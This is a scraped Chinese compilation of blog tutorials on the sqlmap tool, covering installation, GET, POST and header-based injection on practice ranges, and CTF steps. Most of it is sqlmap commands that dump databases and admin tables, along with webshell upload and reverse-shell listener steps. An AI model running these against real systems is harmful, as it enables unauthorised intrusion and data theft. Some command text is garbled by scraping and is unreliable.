sqlmap

sql 注入工具sqlmap的使用

醉酒当歌 提交于 2019-11-29 19:18:38
sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79” 测试当前连接是否为注入点 sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--dbs 获取数据库列表 sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--current-db 获取当前网站所链接的数据库 sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--tables -D“目标数据库” 获取目标数据库所有表信息 sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--columns -T“管理员表”-D“目标数据库” sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--dump -C“字段”-T“管理员表”-D“目标数据库” 来源: https://www.cnblogs.com/abels0025/p/11528915.html

爆库记录(X-Forwarded-For注入漏洞实战 记录)

我与影子孤独终老i 提交于 2019-11-29 16:29:33
环境位置: https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe 获取登陆地址的请求信息 往请求头信息加入X-Forwarded-For:* 一起写入 保存到本地txt文件 123.txt 执行sqlmap 搜索看有没有漏洞 /*--> */ /*--> */ sqlmap.py -r /Users/lucax/Desktop/123.txt 出现: (存在可以注入) 获取当前用户权限 /*--> */ /*--> */ sqlmap.py -r /Users/lucax/Desktop/123.txt --current-user 获取当前数据库库名 /*--> */ /*--> */ sqlmap.py -r /Users/lucax/Desktop/123.txt --dbs 获取数据库表名 /*--> */ /*--> */ sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar --tables 获取表里面的字段名 /*--> */ /*--> */ sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar -T user --columns 获取字段对应的值

CTF-注入http报文

有些话、适合烂在心里 提交于 2019-11-29 16:06:21
1. 设置浏览器代理,拦截网页数据。 2. 复制拦截的raw代码,生成.raw文件 3. 使用sqlmap:   sqlmap -r request.raw -level 5 -risk 3 -dbs -dbms mysql --batch   sqlmap -r request.raw -level 5 -risk 3 -D "数据库名" -tables 查看对应数据库中的数据表   sqlmap -r request.raw -level 5 -risk 3 -D "数据库名" -T "表名" -columns 查看对应字段 --batch   sqlmap -r request.raw -level 5 -risk 3 -D "数据库名" -T "表名" -C "列名" -dump --batch 4. 网站后台寻找注入点   主题的404页面可以上传webshell   webshell 获取 /user/share/webshell/php/ 5. 执行shell 获取反弹shell   监听 nc -nlvp port   启动终端 python -c "import pty;pty.spawn('/bin/bash')" 6.提权 来源: https://www.cnblogs.com/Crux614/p/11521650.html

sqlmap安装

我是研究僧i 提交于 2019-11-29 15:07:32
sqlmap需要环境 1.python 2.7版本 2.sqlmap压缩包 python2.7下载地址: https://www.python.org/ 选择python 2.7.16 下载安装 安装好后在cmd下使用python测试是否有环境变量 没有>>>需要配置环境变量 鼠标右键,点击此电脑属性 >>高级系统设置 新建,选择自己安装python的目录 SQLMAP 下载地址: http://sqlmap.org/ 下载后解压,把解压后的文件夹放到python目录下,最好文件夹改一下名称,我自己改成sqlmap 然后在桌面右键>>新建快捷方式 完成后的图标 右键属性>>修改路径 确定后打开 输入sqlmap.py出现这个界面就安装成功了 谢谢各位朋友的支持 来源: https://blog.csdn.net/weixin_42587513/article/details/100836399

SQL注入漏洞测试(POST)

╄→гoц情女王★ 提交于 2019-11-29 05:43:35
任意输入用户名密码 开启burpsuite,设置代理,截断登陆POST请求的数据包 将数据包保存为txt文件,打开sqlmap 开始爆数据库,表,列,字段值,例如:sqlmap -r txt文件路径 --dbs;sqlmap -r txt文件路径 -D 数据库名 --tables;sqlmap -r txt文件路径 -D 数据库名 -T 表名 --columns … 爆出name值,password值用md5解密,输入用户名密码的到key 来源: https://blog.csdn.net/qq_36933272/article/details/100531825

SQLMAP注入教程-11种常见SQLMAP使用方法详解

99封情书 提交于 2019-11-28 21:37:34
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法: 一、SQLMAP用于Access数据库注入 (1) 猜解是否能注入 1 2 win : python sqlmap.py - u " http://www.xxx.com/en/CompHonorBig.asp?id=7 " Linux : .lmap.py - u " http://www.xxx.com/en/CompHonorBig.asp?id=7 " (2) 猜解表 1 2 win : python sqlmap.py - u " http://www.xxx.com/en/CompHonorBig.asp?id=7 " --tables Linux : .lmap.py - u " http://www.xxx.com/en/CompHonorBig.asp?id=7 " --tables (3) 根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表) 1 2 win : python sqlmap.py - u " http://www.xxx.com/en

关于sqlmap的一些命令

岁酱吖の 提交于 2019-11-28 21:37:13
Options(选项): --version 显示程序的版本号并退出 -h, --help 显示此帮助消息并退出 -v VERBOSE 详细级别:0-6(默认为1) Target(目标):以下至少需要设置其中一个选项,设置目标URL。 -d DIRECT 直接连接到数据库。 -u URL, --url=URL 目标URL。 -l LIST 从Burp或WebScarab代理的日志中解析目标。 -r REQUESTFILE 从一个文件中载入HTTP请求。 -g GOOGLEDORK 处理Google dork的结果作为目标URL。 -c CONFIGFILE 从INI配置文件中加载选项。 Request(请求)::这些选项可以用来指定如何连接到目标URL。 --data=DATA 通过POST发送的数据字符串 --cookie=COOKIE HTTP Cookie头 --cookie-urlencode URL 编码生成的cookie注入 --drop-set-cookie 忽略响应的Set - Cookie头信息 --user-agent=AGENT 指定 HTTP User - Agent头 --random-agent 使用随机选定的HTTP User - Agent头 --referer=REFERER 指定 HTTP Referer头 --headers=HEADERS

关于sqlmap的使用

不想你离开。 提交于 2019-11-28 21:36:54
好记性不如烂笔头,记录一下。 带cookie的注入 1 python sqlmap.py -u "http://www.xxx.com?id=1" --cookie="cookie_value" --level 2 从Post请求包注入(-p表示对指定的参数做注入) 1 python sqlmap.py -r Post_request.txt -p "special" 另外当交互采用的是JSON形式的字符串时,对需要注入的参数在键值对字段前面加上#号。 另外增加几个常用操作符 1 --dbms mysql #使用mysql数据库 2 --dbs #罗列出数据库 3 -D test #选择使用test数据库,否则默认为当前数据库 4 --tables #罗列出数据库所有表 5 -T test #选择使用某个表 6 --columns #罗列出所有的字段名 7 -C #dump出指定的字段8 --proxy="http://127.0.0.1:8087" #指定代理,你懂得- - 记录一下。 来源: http://www.cnblogs.com/xiangxi/p/6258113.html

sqlmap-checkEnvironment函数解读

早过忘川 提交于 2019-11-28 19:43:40
版本:sqlmap1.3.4#stable 位置:sqlmap.py line 96 作用:检查sqlmap的运行环境,导入全局变量 基础知识 检查modulePath()的返回值是否为文档夹: 1 os.path.isdir(modulePath()) 这个函数就在checkEnvironment函数的上面: 12345678910111213141516 def modulePath(): """ This will get us the program's directory, even if we are frozen using py2exe """ try: _ = sys.executable if weAreFrozen() else __file__ except NameError: _ = inspect.getsourcefile(modulePath) return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)sys.executable返回了python.exe的绝对路径如果报错,则_的值为modulePath所在的路径最后返回路径 返回来看我们的checkEnvironment函数:

SQL注入:POST注入

余生颓废 提交于 2019-11-28 13:18:23
POST注入简介 POST注入属于注入的一种,相信大家在之前的课程中都知道POST\GET两种传参方式。 POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别。 POST注入高危点 登录框、查询框等各种和数据有交互的框 最经典的POST注入案例:'or 1=1 # Sqlmap如何对POST类型SQL注入进行注入 --forms sqlmap去读取页面中POST传参的表单的传参名然后进行SQL注入 -r 1.txt sqlmap读取数据包文件进行SQL注入,注入处可以打一个*号告诉Sqlmap测试那个点 post注入 在填写表单的时候提交使用post传参 一般是在用户名框或者密码框尝试 sqlmap如何跑post注入 方法一:sqlmap.py -u http://xxxxxx --form 方法二:通过抓包的方式,保存在文件中,在注入点加上 * 号提示sqlmap,同时有些注入点,是需要登录的状态下的权限,而一般的sqlmap是没有权限的,但是通过抓包的方式存在cookie 来源: https://www.cnblogs.com/yanlzy/p/11938979.html